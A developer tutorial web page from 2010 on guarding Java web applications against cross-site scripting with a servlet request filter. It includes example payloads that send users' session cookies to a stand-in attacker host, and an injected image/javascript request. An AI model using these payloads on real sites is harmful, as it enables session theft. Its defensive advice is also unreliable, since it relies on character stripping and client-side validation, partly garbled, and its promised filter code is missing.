http://www.developer.com/

Back to article

Make Your Java Web Applications Impervious to Cross-site Scripting


February 22, 2010

If you develop web applications, cross-site scripts are a security issue you should understand and address. Attackers use cross-site scripting to add scripts into web pages and to access users' sensitive information. The attacker inserts cross-site script code is into the user's request page, and the code runs in the user's browser. The script is written in JavaScript, VBScript and other browser-supported technologies.

If you develop Java-based web applications, you can use a filter to intercept and modify the user's request and response. Specifically, you can use server-side filtering to prevent malicious coders from requesting parameters and cookies. This article explains how to create and implement a custom filter that can guard against the various types of cross-site scripting attacks.

Types of Cross-site Scripting

There are three types of cross-site scripting attacks:

  1. Persistent
  2. Non-persistent
  3. DOM-based

Persistent

In a persistent cross-site scripting attack, the server saves the attacker's script code and then displays it on user pages. For example, many sites offer comments sections where users post comments, which the sites stored in databases. Normally, a user is tracked by session ID cookie. An attacker can add a script to track user cookies using the comments section. For example, the following script tracks user's cookie details.

<script>document.location= 'http://www. attackerhost/crack.html?'+document.cookie</script>


Non-persistent

In a non-persistent cross-site scripting attack, the attacker's script code is added by the user's query parameters or HTML form submissions. The server adds this script in the user request page and sends it back to the user without proper response validation. Here is an example of a script for getting user cookie details through a URL:

http://examplesite/index.html?jsessionid=12312312&user=<script>document.location='http://attackerhost/crack.html?'+document.cookie</script>


DOM-based

DOM-based attacks occur in the content processing performed by the client, typically in client-side JavaScript. For example, the URL http://www. examplesite /welcome.html contains the following content:

<html>
      < script >
         var pos=document.URL.indexOf("user=")+5;
         document.write(document.URL.substring(pos,document.URL.length));
      </ script >
</html>


This page will use the value from the "user" parameter in the following manner.

http://www. examplesite /welcome.html?user=siva


An attacker can abuse this by luring the client to click on a link like this:

http://www. examplesite /welcome.html?user=<script>alert(document.cookie)</script>


Client-Side Validation for Cross-Site Scripting

Use the following, fairly simple methods to eliminate cross-site scripting vulnerabilities.

  1. Client-side validation – Remove untrusted characters from input fields in forms. Attackers use JavaScript to validate the malicious characters in input fields.
  2. Escaping – Escape all untrusted data using a method appropriate for the output content. Here are the different escaping schemes for validating untrusted characters:
    1. HTML numeric entity encoding
    2. JavaScript escaping
    3. CSS escaping
    4. URL encoding
The next page explains how to use these techniques.

Client-Side Protection: Removing Malicious Characters

To help prevent attackers from running cross-site scripts on client side, you can remove malicious characters from request parameters and cookies. The following steps will accomplish this:

  1. Identify malicious characters, such as <, >, (, ), and %, in parameters and cookies.
  2. Filter out the malicious characters from the parameters or cookies.

For example, the following request header for the URL http://www.examplesite/welcome.html?user=siva has cross-site scripting in the parameter 'user'.

Request/Response:
   
   GET /www.examplesite /welcome.html?user=siva>%22%27><img%
   20src%3d%22javascript:alert(66647)%22> HTTP/1.0
   Cookie: JSESSIONID="1658AFD202313272EB979A90E96B3A3D ";
   userLocale=en_US; userTimezone="Asia/Calcutta"
   Accept: */*
   Accept-Language: en-US
   User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.5)
   Gecko/2008120122 Firefox/3.0.5
   Host: www.examplesite:8180
   Referrer: http://www.examplesite:8180/welcome.html?user=siva


After the user sends the request, the server-side filter will remove all malicious characters from the parameter, avoiding cross-site script execution on client side and thereby sending a secured response to the client.

Filters are processed based on the declared order in their deployment descriptors. So, to declare a filter for the current example, you would place the following filter (crossSite) on top of all other filters in the deployment descriptor (web.xml) of web application.

<filter>
    <filter-name>crossSite</filter-name>
    <filter-class>com.filters.RequestFilter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>crossSite</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>


This filter mapping calls all requests using the URL pattern /*.

A Custom Filter

The custom filter in Listing 1 will remove the untrusted characters from requests and cookies using the HttpServletRequestWrapper class, which is used to wrap the user's request (wrapped request object). Based upon the user's request to get the parameters or cookies, this wrapped request object removes the unsafe characters from the request and returns the response to the client. The wrapped request contains the trusted character for further processing.

Server-Side Protection: Implementing the Filter

The following steps implement the server-side filter in your web application.

  1. Add the compiled RequestFilter class in the WEB-INF/classes folder of the web application.
  2. Add the filter declaration in the deployment descriptor (web.xml).

With the techniques you have learned here (client-side validation and server-side filtering), you are ready to combat cross-site scripting in your Java-based web applications.

About the Authors

Sivakumar Kuppusamy is a product technical lead with product incubation engineering at Infosys, involved in the design and development of Java EE applications.

Ramasubramanian Thiyagarajan is a technology analyst with product incubation engineering at Infosys, involved in the design and development of Java EE applications.

Vijayasaradhi Paramakusum is a technology lead with product incubation engineering at Infosys, involved in the design and development of Java EE applications.

Sitemap | Contact Us

Thanks for your registration, follow us on our social networks to keep up-to-date